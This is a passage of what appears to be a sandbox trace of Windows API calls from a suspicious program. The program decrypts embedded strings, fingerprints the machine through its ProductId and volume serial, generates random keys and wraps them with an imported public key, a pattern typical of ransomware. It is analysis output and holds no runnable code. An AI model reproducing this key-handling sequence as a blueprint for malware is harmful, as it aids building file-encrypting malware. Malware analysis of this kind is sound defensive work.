phKey=0x6147f4*=0x616700) returned 1 [0052.501] CryptDecrypt (in: hKey=0x616700, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6173a0, pdwDataLen=0x18fac0 | out: pbData=0x6173a0, pdwDataLen=0x18fac0) returned 1 [0052.501] CryptDestroyKey (hKey=0x616700) returned 1 [0052.501] GetProcessHeap () returned 0x600000 [0052.501] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x20) returned 0x616bd0 [0052.501] CryptImportKey (in: hProv=0x614968, pbData=0x18fa50, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x616700) returned 1 [0052.501] CryptDecrypt (in: hKey=0x616700, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x616bd0, pdwDataLen=0x18fac0 | out: pbData=0x616bd0, pdwDataLen=0x18fac0) returned 1 [0052.501] CryptDestroyKey (hKey=0x616700) returned 1 [0052.501] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fabc | out: phkResult=0x18fabc*=0xb0) returned 0x0 [0052.502] RegQueryValueExA (in: hKey=0xb0, lpValueName="ProductId", lpReserved=0x0, lpType=0x0, lpData=0x18fac8, lpcbData=0x18fac4*=0x400 | out: lpType=0x0, lpData=0x18fac8*=0x30, lpcbData=0x18fac4*=0x18) returned 0x0 [0052.502] RegCloseKey (hKey=0xb0) returned 0x0 [0052.502] GetProcessHeap () returned 0x600000 [0052.502] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6173a0 | out: hHeap=0x600000) returned 1 [0052.502] GetProcessHeap () returned 0x600000 [0052.502] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616bd0 | out: hHeap=0x600000) returned 1 [0052.502] GetProcessHeap () returned 0x600000 [0052.502] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x20) returned 0x616bd0 [0052.502] CryptImportKey (in: hProv=0x614968, pbData=0x18f830, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x616700) returned 1 [0052.502] CryptDecrypt (in: hKey=0x616700, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x616bd0, pdwDataLen=0x18f894 | out: pbData=0x616bd0, pdwDataLen=0x18f894) returned 1 [0052.502] CryptDestroyKey (hKey=0x616700) returned 1 [0052.502] GetEnvironmentVariableW (in: lpName="SystemDrive", lpBuffer=0x18f898, nSize=0x104 | out: lpBuffer="C:") returned 0x2 [0052.502] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18f890, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18f890*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0052.503] GetProcessHeap () returned 0x600000 [0052.503] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616bd0 | out: hHeap=0x600000) returned 1 [0052.503] wsprintfA (in: param_1=0x18fadf, param_2="-%08X" | out: param_1="-9C354B42") returned 9 [0052.503] wsprintfW (in: param_1=0x18fef0, param_2="\\\\.\\%c:" | out: param_1="\\\\.\\C:") returned 6 [0052.503] wsprintfW (in: param_1=0x18ff00, param_2="%c:\\" | out: param_1="C:\\") returned 3 [0052.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0052.503] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18fee0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fee0*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0052.503] GetProcessHeap () returned 0x600000 [0052.507] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x34) returned 0x616700 [0052.507] GetProcessHeap () returned 0x600000 [0052.507] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616988 [0052.507] GetProcessHeap () returned 0x600000 [0052.507] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x2c) returned 0x618450 [0052.507] CryptGenRandom (in: hProv=0x614968, dwLen=0x20, pbBuffer=0x61845c | out: pbBuffer=0x61845c) returned 1 [0052.507] GetProcessHeap () returned 0x600000 [0052.507] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x2c) returned 0x618488 [0052.507] CryptGenRandom (in: hProv=0x614968, dwLen=0x20, pbBuffer=0x618494 | out: pbBuffer=0x618494) returned 1 [0052.507] GetProcessHeap () returned 0x600000 [0052.507] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x20) returned 0x616bd0 [0052.507] CryptImportKey (in: hProv=0x614968, pbData=0x18fed0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x6184c0) returned 1 [0052.507] CryptDecrypt (in: hKey=0x6184c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x616bd0, pdwDataLen=0x18ff38 | out: pbData=0x616bd0, pdwDataLen=0x18ff38) returned 1 [0052.507] CryptDestroyKey (hKey=0x6184c0) returned 1 [0052.507] GetProcessHeap () returned 0x600000 [0052.507] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x80) returned 0x6184c0 [0052.507] GetProcessHeap () returned 0x600000 [0052.508] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x80) returned 0x618548 [0052.508] CryptImportKey (in: hProv=0x614968, pbData=0x6151d8, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x0, phKey=0x18ff18 | out: phKey=0x18ff18*=0x6185d0) returned 1 [0052.508] CryptEncrypt (in: hKey=0x6185d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6184c0*, pdwDataLen=0x18ff1c*=0x75, dwBufLen=0x80 | out: pbData=0x6184c0*, pdwDataLen=0x18ff1c*=0x80) returned 1 [0052.508] CryptDestroyKey (hKey=0x6185d0) returned 1 [0052.508] CryptImportKey (in: hProv=0x614968, pbData=0x6151d8, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x0, phKey=0x18ff18 | out: phKey=0x18ff18*=0x6185d0) returned 1 [0052.508] CryptEncrypt (in: hKey=0x6185d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x618548*, pdwDataLen=0x18ff1c*=0x75, dwBufLen=0x80 | out: pbData=0x618548*, pdwDataLen=0x18ff1c*=0x80) returned 1 [0052.508] CryptDestroyKey (hKey=0x6185d0) returned 1 [0052.508] GetProcessHeap () returned 0x600000 [0052.508] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616bd0 | out: hHeap=0x600000) returned 1 [0052.508] GetProcessHeap () returned 0x600000 [0052.508] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa0) returned 0x6185d0 [0052.508] CryptImportKey (in: hProv=0x614968, pbData=0x18fec0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x618678) returned 1 [0052.508] CryptDecrypt (in: hKey=0x618678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6185d0, pdwDataLen=0x18ff28 | out: pbData=0x6185d0, pdwDataLen=0x18ff28) returned 1 [0052.508] CryptDestroyKey (hKey=0x618678) returned 1 [0052.508] GetProcessHeap () returned 0x600000 [0052.508] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1c) returned 0x616bd0 [0052.508] GetProcessHeap () returned 0x600000 [0052.508] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x615eb8 [0052.508] GetProcessHeap () returned 0x600000 [0052.508] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x615ed0 [0052.508] GetProcessHeap () returned 0x600000 [0052.508] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x19) returned 0x616bf8 [0052.509] GetProcessHeap () returned 0x600000 [0052.509] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x615ee8 [0052.509] GetProcessHeap () returned 0x600000 [0052.509] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xd) returned 0x615f00 [0052.509] GetProcessHeap () returned 0x600000 [0052.509] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1a) returned 0x616c20 [0052.509] GetProcessHeap () returned 0x600000 [0052.509] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1b) returned 0x616c48 [0052.509] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0052.509] GetProcAddress (hModule=0x77c40000, lpProcName="NtQueryObject") returned 0x77c5f9e8 [0052.509] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0052.509] GetProcAddress (hModule=0x77c40000, lpProcName="NtQuerySystemInformation") returned 0x77c5fda0 [0052.509] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0052.509] GetProcAddress (hModule=0x77c40000, lpProcName="RtlGetVersion") returned 0x77c7873a [0052.509] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x76d30000 [0052.509] GetProcAddress (hModule=0x76d30000, lpProcName="GetFinalPathNameByHandleW") returned 0x76d60a25 [0052.510] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x76d30000 [0052.510] GetProcAddress (hModule=0x76d30000, lpProcName="QueryFullProcessImageNameW") returned 0x76d515f7 [0052.510] GetProcessHeap () returned 0x600000 [0052.510] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6185d0 | out: hHeap=0x600000) returned 1 [0052.510] GetProcessHeap () returned 0x600000 [0052.510] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615eb8 | out: hHeap=0x600000) returned 1 [0052.510] GetProcessHeap () returned 0x600000 [0052.510] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615ed0 | out: hHeap=0x600000) returned 1 [0052.510] GetProcessHeap () returned 0x600000 [0052.510] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616bf8 | out: hHeap=0x600000) returned 1 [0052.510] GetProcessHeap () returned 0x600000 [0052.510] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615ee8 | out: hHeap=0x600000) returned 1 [0052.510] GetProcessHeap () returned 0x600000 [0052.510] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615f00 | out: hHeap=0x600000) returned 1 [0052.510] GetProcessHeap () returned 0x600000 [0052.510] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616c20 | out: hHeap=0x600000) returned 1 [0052.510] GetProcessHeap () returned 0x600000 [0052.510] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616c48 | out: hHeap=0x600000) returned 1 [0052.510] GetProcessHeap () returned 0x600000 [0052.510] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616bd0 | out: hHeap=0x600000) returned 1 [0052.510] GetProcessHeap () returned 0x600000 [0052.510] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1000) returned 0x618e78 [0052.510] NtQueryObject (in: Handle=0x0, ObjectInformationClass=0x3, ObjectInformation=0x618e78, ObjectInformationLength=0x1000, ReturnLength=0x18ff0c | out: ObjectInformation=0x618e78, ReturnLength=0x18ff0c) returned 0xc0000004 [0052.511] GetProcessHeap () returned 0x600000 [0052.511] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x618e78 | out: hHeap=0x600000) returned 1 [0052.511] GetProcessHeap () returned 0x600000 [0052.511] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x2000) returned 0x618e78 [0052.511] NtQueryObject (in: Handle=0x0, ObjectInformationClass=0x3, ObjectInformation=0x618e78, ObjectInformationLength=0x2000, ReturnLength=0x18ff0c | out: ObjectInformation=0x618e78, ReturnLength=0x18ff0c) returned 0x0 [0052.511] RtlGetVersion (in: lpVersionInformation=0x18fdf8 | out: lpVersionInformation=0x18fdf8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 0x0 [0052.511] GetProcessHeap () returned 0x600000 [0052.511] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x618e78 | out: hHeap=0x600000) returned 1 [0052.511] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4053b0, lpParameter=0x610e40, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb0 [0052.512] WaitForSingleObject (hHandle=0xb0, dwMilliseconds=0xffffffff) returned 0x0 [0097.334] CloseHandle (hObject=0xb0) returned 1 [0097.336] GetProcessHeap () returned 0x600000 [0097.336] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6184c0 | out: hHeap=0x600000) returned 1 [0097.336] GetProcessHeap () returned 0x600000 [0097.336] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x618548 | out: hHeap=0x600000) returned 1 [0097.336] GetProcessHeap () returned 0x600000 [0097.336] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x618450 | out: hHeap=0x600000) returned 1 [0097.336] GetProcessHeap () returned 0x600000 [0097.336] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x618488 | out: hHeap=0x600000) returned 1 [0097.336] GetProcessHeap () returned 0x600000 [0097.336] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616700 | out: hHeap=0x600000) returned 1 [0097.336] GetProcessHeap () returned 0x600000 [0097.341] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616988 | out: hHeap=0x600000) returned 1 [0097.342] GetProcessHeap () returned 0x600000 [0097.342] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x610e40 | out: hHeap=0x600000) returned 1 [0097.345] GetProcessHeap () returned 0x600000 [0097.345] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x616988 [0097.345] GetProcessHeap () returned 0x600000 [0097.345] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616598 | out: hHeap=0x600000) returned 1 [0097.345] GetProcessHeap () returned 0x600000 [0097.345] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616600 | out: hHeap=0x600000) returned 1 [0097.348] GetProcessHeap () returned 0x600000 [0097.348] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616b58 | out: hHeap=0x600000) returned 1 [0097.348] GetProcessHeap () returned 0x600000 [0097.348] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6166e0 | out: hHeap=0x600000) returned 1 [0097.349] GetProcessHeap () returned 0x600000 [0097.349] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x618340 | out: hHeap=0x600000) returned 1 [0097.349] GetProcessHeap () returned 0x600000 [0097.349] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6183c8 | out: hHeap=0x600000) returned 1 [0097.349] GetProcessHeap () returned 0x600000 [0097.357] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x617358 | out: hHeap=0x600000) returned 1 [0097.357] GetProcessHeap () returned 0x600000 [0097.357] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616978 | out: hHeap=0x600000) returned 1 [0097.357] GetProcessHeap () returned 0x600000 [0097.359] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614380 | out: hHeap=0x600000) returned 1 [0097.364] GetProcessHeap () returned 0x600000 [0097.364] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6143a8 | out: hHeap=0x600000) returned 1 [0097.364] GetProcessHeap () returned 0x600000 [0097.364] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615c20 | out: hHeap=0x600000) returned 1 [0097.575] GetProcessHeap () returned 0x600000 [0097.575] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x60f0e8 | out: hHeap=0x600000) returned 1 [0097.575] GetProcessHeap () returned 0x600000 [0097.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6144e8 | out: hHeap=0x600000) returned 1 [0097.576] GetProcessHeap () returned 0x600000 [0097.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614538 | out: hHeap=0x600000) returned 1 [0097.576] GetProcessHeap () returned 0x600000 [0097.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614510 | out: hHeap=0x600000) returned 1 [0097.576] GetProcessHeap () returned 0x600000 [0097.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615a38 | out: hHeap=0x600000) returned 1 [0097.576] GetProcessHeap () returned 0x600000 [0097.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615a28 | out: hHeap=0x600000) returned 1 [0097.576] GetProcessHeap () returned 0x600000 [0097.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6143f8 | out: hHeap=0x600000) returned 1 [0097.576] GetProcessHeap () returned 0x600000 [0097.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615a58 | out: hHeap=0x600000) returned 1 [0097.576] GetProcessHeap () returned 0x600000 [0097.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615d08 | out: hHeap=0x600000) returned 1 [0097.576] GetProcessHeap () returned 0x600000 [0097.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615c68 | out: hHeap=0x600000) returned 1 [0097.576] GetProcessHeap () returned 0x600000 [0097.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6143d0 | out: hHeap=0x600000) returned 1 [0097.576] GetProcessHeap () returned 0x600000 [0097.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615c78 | out: hHeap=0x600000) returned 1 [0097.576] GetProcessHeap () returned 0x600000 [0097.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615d20 | out: hHeap=0x600000) returned 1 [0097.576] GetProcessHeap () returned 0x600000 [0097.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615c88 | out: hHeap=0x600000) returned 1 [0097.576] GetProcessHeap () returned 0x600000 [0097.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615c98 | out: hHeap=0x600000) returned 1 [0097.577] GetProcessHeap () returned 0x600000 [0097.577] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6161b0 | out: hHeap=0x600000) returned 1 [0097.577] GetProcessHeap () returned 0x600000 [0097.577] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615cc8 | out: hHeap=0x600000) returned 1 [0097.577] GetProcessHeap () returned 0x600000 [0097.577] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6161c0 | out: hHeap=0x600000) returned 1 [0097.577] GetProcessHeap () returned 0x600000 [0097.577] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614ab0 | out: hHeap=0x600000) returned 1 [0097.577] GetProcessHeap () returned 0x600000 [0097.577] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615d38 | out: hHeap=0x600000) returned 1 [0097.577] GetProcessHeap () returned 0x600000 [0097.577] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6161e0 | out: hHeap=0x600000) returned 1 [0097.577] GetProcessHeap () returned 0x600000 [0097.577] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6161d0 | out: hHeap=0x600000) returned 1 [0097.577] GetProcessHeap () returned 0x600000 [0097.577] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614448 | out: hHeap=0x600000) returned 1 [0097.577] GetProcessHeap () returned 0x600000 [0097.577] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616200 | out: hHeap=0x600000) returned 1 [0097.577] GetProcessHeap () returned 0x600000 [0097.577] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6161f0 | out: hHeap=0x600000) returned 1 [0097.577] GetProcessHeap () returned 0x600000 [0097.577] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616230 | out: hHeap=0x600000) returned 1 [0097.577] GetProcessHeap () returned 0x600000 [0097.577] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616220 | out: hHeap=0x600000) returned 1 [0097.577] GetProcessHeap () returned 0x600000 [0097.577] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616250 | out: hHeap=0x600000) returned 1 [0097.577] GetProcessHeap () returned 0x600000 [0097.577] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616240 | out: hHeap=0x600000) returned 1 [0097.763] GetProcessHeap () returned 0x600000 [0097.764] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616270 | out: hHeap=0x600000) returned 1 [0097.764] GetProcessHeap () returned 0x600000 [0097.764] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616260 | out: hHeap=0x600000) returned 1 [0097.764] GetProcessHeap () returned 0x600000 [0097.764] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616290 | out: hHeap=0x600000) returned 1 [0097.764] GetProcessHeap () returned 0x600000 [0097.764] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616280 | out: hHeap=0x600000) returned 1 [0097.764] GetProcessHeap () returned 0x600000 [0097.765] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615d50 | out: hHeap=0x600000) returned 1 [0097.765] GetProcessHeap () returned 0x600000 [0097.765] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6162a0 | out: hHeap=0x600000) returned 1 [0097.765] GetProcessHeap () returned 0x600000 [0097.765] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615d68 | out: hHeap=0x600000) returned 1 [0097.765] GetProcessHeap () returned 0x600000 [0097.765] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6162b0 | out: hHeap=0x600000) returned 1 [0097.766] GetProcessHeap () returned 0x600000 [0097.766] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615d80 | out: hHeap=0x600000) returned 1 [0097.770] GetProcessHeap () returned 0x600000 [0097.770] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6162c0 | out: hHeap=0x600000) returned 1 [0097.770] GetProcessHeap () returned 0x600000 [0097.772] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6162e0 | out: hHeap=0x600000) returned 1 [0097.774] GetProcessHeap () returned 0x600000 [0097.774] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6162d0 | out: hHeap=0x600000) returned 1 [0097.774] GetProcessHeap () returned 0x600000 [0097.780] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616300 | out: hHeap=0x600000) returned 1 [0097.780] GetProcessHeap () returned 0x600000 [0097.780] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6162f0 | out: hHeap=0x600000) returned 1 [0097.782] GetProcessHeap () returned 0x600000 [0097.782] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616320 | out: hHeap=0x600000) returned 1 [0097.782] GetProcessHeap () returned 0x600000 [0097.782] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616310 | out: hHeap=0x600000) returned 1 [0097.782] GetProcessHeap () returned 0x600000 [0097.782] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616340 | out: hHeap=0x600000) returned 1 [0097.782] GetProcessHeap () returned 0x600000 [0097.782] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616330 | out: hHeap=0x600000) returned 1 [0097.782] GetProcessHeap () returned 0x600000 [0097.782] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6160f0 | out: hHeap=0x600000) returned 1 [0097.782] GetProcessHeap () returned 0x600000 [0097.783] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616350 | out: hHeap=0x600000) returned 1 [0097.783] GetProcessHeap () returned 0x600000 [0097.783] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615d98 | out: hHeap=0x600000) returned 1 [0097.783] GetProcessHeap () returned 0x600000 [0097.783] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616360 | out: hHeap=0x600000) returned 1 [0097.783] GetProcessHeap () returned 0x600000 [0097.783] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615db0 | out: hHeap=0x600000) returned 1 [0097.783] GetProcessHeap () returned 0x600000 [0097.783] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616370 | out: hHeap=0x600000) returned 1 [0097.783] GetProcessHeap () returned 0x600000 [0097.783] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616390 | out: hHeap=0x600000) returned 1 [0097.783] GetProcessHeap () returned 0x600000 [0097.783] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616380 | out: hHeap=0x600000) returned 1 [0097.783] GetProcessHeap () returned 0x600000 [0097.783] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6163b0 | out: hHeap=0x600000) returned 1 [0097.783] GetProcessHeap () returned 0x600000 [0097.783] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6163a0 | out: hHeap=0x600000) returned 1 [0097.783] GetProcessHeap () returned 0x600000 [0097.783] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6163d0 | out: hHeap=0x600000) returned 1 [0097.783] GetProcessHeap () returned 0x600000 [0097.783] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6163c0 | out: hHeap=0x600000) returned 1 [0097.783] GetProcessHeap () returned 0x600000 [0097.783] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6163f0 | out: hHeap=0x600000) returned 1 [0097.783] GetProcessHeap () returned 0x600000 [0097.783] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6163e0 | out: hHeap=0x600000) returned 1 [0097.783] GetProcessHeap () returned 0x600000 [0097.783] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616410 | out: hHeap=0x600000) returned 1 [0097.783] GetProcessHeap () returned 0x600000 [0097.783] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616400 | out: hHeap=0x600000) returned 1 [0097.784] GetProcessHeap () returned 0x600000 [0097.784] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616430 | out: hHeap=0x600000) returned 1 [0097.784] GetProcessHeap () returned 0x600000 [0097.784] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616420 | out: hHeap=0x600000) returned 1 [0097.784] GetProcessHeap () returned 0x600000 [0097.784] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616450 | out: hHeap=0x600000) returned 1 [0097.784] GetProcessHeap () returned 0x600000 [0097.784] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616440 | out: hHeap=0x600000) returned 1 [0097.784] GetProcessHeap () returned 0x600000 [0097.784] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616470 | out: hHeap=0x600000) returned 1 [0097.784] GetProcessHeap () returned 0x600000 [0097.784] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616460 | out: hHeap=0x600000) returned 1 [0097.784] GetProcessHeap () returned 0x600000 [0097.784] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616490 | out: hHeap=0x600000) returned 1 [0097.784] GetProcessHeap () returned 0x600000 [0097.784] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616480 | out: hHeap=0x600000) returned 1 [0097.784] GetProcessHeap () returned 0x600000 [0097.784] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615dc8 | out: hHeap=0x600000) returned 1 [0097.784] GetProcessHeap () returned 0x600000 [0097.784] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6164a0 | out: hHeap=0x600000) returned 1 [0097.784] GetProcessHeap () returned 0x600000 [0097.784] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6164c0 | out: hHeap=0x600000) returned 1 [0097.784] GetProcessHeap () returned 0x600000 [0097.784] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6164b0 | out: hHeap=0x600000) returned 1 [0097.784] GetProcessHeap () returned 0x600000 [0097.784] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6164e0 | out: hHeap=0x600000) returned 1 [0097.784] GetProcessHeap () returned 0x600000 [0097.784] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6164d0 | out: 